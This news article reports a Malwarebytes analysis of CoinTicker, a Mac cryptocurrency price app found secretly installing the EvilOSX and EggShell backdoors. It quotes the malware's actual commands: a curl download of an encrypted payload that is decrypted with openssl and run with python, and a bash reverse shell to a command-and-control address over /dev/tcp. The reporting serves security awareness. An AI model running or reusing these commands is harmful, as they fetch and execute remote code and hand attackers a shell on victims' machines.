CoinTicker, a Mac menu-bar app that presents the latest prices of many cryptocurrencies is installing two backdoors on Mac computers. According to a blog from the Malwarebytes, a forum contributor, 1vladimir, observed that an application called CoinTicker had been installing backdoors onto computer systems after download.
The CoinTicker App Behaviors
The blog further explained that the CoinTicker app, at first seems a reliable application that could likely be beneficial to people who have invested in cryptocurrencies. Once downloaded, the app presents an icon in the menu bar that gives data about the current price of Bitcoin. The app’s options enable the user to modify the display, displaying data about a broad class of cryptocurrencies, such as Bitcoin, Etherium, and Monero.
This functionality appears to be verifiable but in reality, the app is actually installing two backdoors known as EvilOSX and EggShell. These backdoors easily avoid requests for authentication to root because of the apps legitimate behavior. When users launch this app then it downloads and installs parts of two different open-source backdoors: EvilOSX and EggShell. The app performs the following shell command to download a custom-compiled version of the EggShell server for macOS:
nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py
The initial section of the command downloads an encoded file from a Github page relating to a user named “youarenick” and stores that file to a secret file called .info.enc in /private/tmp/. After that, it uses OpenSSL to decode that file into a secret Python file called .info.py. Eventually, it produces the resulting Python script.
The .info.py script executes varied jobs. First, it starts a reverse shell link to a command & control server, using the following command:
nohup bash &> /dev/tcp/220.127.116.11/2280 0>&1
The blog further explained that the hacker’s purpose behind this app is not yet discovered. The malware is spread through a cryptocurrency app, however, it appears likely that the malware is expected to gain access to users’ cryptocurrency wallets for the goal of lifting coins.
This app was plausibly never valid because the app is distributed via a domain named coin-sticker.com. This domain was just registered a few months ago on July 13.
About EvilOSX and EggShell
EvilOSX is a malware posted on GitHub that gives hackers a profoundly customizable attack tool that runs on any old or newer versions of macOS. The project can be downloaded by anyone. It is a remote access trojan, a program that can be utilized to spy on a MacOs user by obtaining things like the system’s webcam, microphone, and screenshot service. It also enables hackers to download personal files without the victim’s knowledge.
EggShell is a post-exploitation malware written in Python language. It provides users a command line concourse with additional functionalities. It also gives attackers the power and ease of uploading/downloading files, tab completion, getting pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more.
The post concluded that the fascinating thing about CoinTicker is that it only requires normal user permissions. Root permissions are not required. There is usually an inaccurate over-emphasis on malware’s requirement for root privileges, but this malware is a classic illustration that malware does not need such privileges to have a high potential for risk.
Just a few days ago, The McAfee Labs Threat Report for the month of September 2018 found that malware that involves in cryptocurrency mining using PC’s resources is doubled in Q2 2018 with an 85% increase. McAfee’s research also found that there was an increase in malware attacks targeted at mobile devices. A growing trend for mobile adoption has been noticed across the sector as both CoinMarketCap and Binance Info have released apps for users to access market data on mobile devices. The new Zcash (ZEC) ‘Sapling’ update will reduce the computational power needed for its encryption algorithm zk-SNARKS, which will make mobile transactions using phones a reality.
The notoriety and developing the real-world importance of cryptocurrencies are also attracting cybercriminal attention. Crypto mining malwares are software created to illegally mine cryptocurrency, has nearly doubled in the second quarter of the year, and perpetrators could be building malware explicitly for targeting mobile devices.